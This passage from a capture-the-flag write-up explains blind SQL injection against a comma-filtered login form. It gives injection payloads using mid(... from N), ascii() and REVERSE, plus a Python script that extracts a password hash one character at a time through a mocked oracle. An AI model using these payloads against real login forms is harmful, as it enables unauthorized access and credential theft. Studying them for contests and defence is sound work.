We cannot use mid(xxx,1,1) or mid(xxx from 1 for 1), but the manual shows that mid(xxx from 1) is allowed: it takes everything from position 1 onward. The ascii() function truncates to the first character, so ascii(mid(xxx from 1)) yields the ASCII code of the first character, ascii(mid(xxx from 2)) the second, and so on.

(8) Extract the data with Burp

a. Determine the length of the passwd field: it turns out to be 32.

(The column name can be guessed: since the POST request uses a passwd field, the database column is probably passwd as well. That way there is no need to go through information_schema; the password can be read straight from the login query.)

admin'-(length(passwd)=48)-'

b. Extract the first character

The payload I actually used is not the one above: it takes characters from the end and reverses them, a detour I took during the contest, but both approaches work. One advantage of the payload below is that it will not error on databases where ascii() does not truncate:

=admin'-(ascii(mid(REVERSE(MID((passwd)from(-1)))from(-1)))=48)-'

This one works as well:

=admin'-(ascii(mid(passwd)from(1))=48)-'

Repeating this while adjusting the offset recovers the 32-character password hash 005b81fd960f61505237dbb7a3202910, which decodes to admin123. Logging in yields the flag, and the walkthrough is complete.
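Automating the character-by-character recovery looks roughly like this. It is a sketch with the HTTP round trip mocked out (a real exploit would submit admin'-(ascii(mid(passwd)from(pos))=code)-' and inspect the login error message), so the transport and names here are mine:

```python
def extract(oracle, length: int) -> str:
    """Recover a secret through a boolean oracle that answers:
    'is the character at 1-based position pos equal to this ASCII code?'
    A linear scan over printable ASCII mirrors the writeup's = test,
    since the filtered characters rule out comma-based comparisons."""
    out = []
    for pos in range(1, length + 1):
        for code in range(32, 127):        # printable ASCII
            if oracle(pos, code):
                out.append(chr(code))
                break
    return "".join(out)

# Mock standing in for the HTTP request against the challenge server.
SECRET = "005b81fd960f61505237dbb7a3202910"   # hash recovered in the writeup

def mock_oracle(pos: int, code: int) -> bool:
    return ord(SECRET[pos - 1]) == code

print(extract(mock_oracle, len(SECRET)))   # 005b81fd960f61505237dbb7a3202910
```

Swapping mock_oracle for a function that sends the encoded payload and applies the "wrong username"/"wrong password" test reproduces the Burp run above.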

Summary

1. All the fuzzing dictionaries used above can be assembled from sqlmap's wordlists and the official MySQL manual.

2. This was only routine fuzzing, but most fuzzing is alike at heart; what matters is the oracle, the position being fuzzed, and the tricks used to construct the payloads.

3. Feedback and discussion from fellow researchers are welcome!

*Author: Conan. Please credit CodeSec.Net when reprinting.
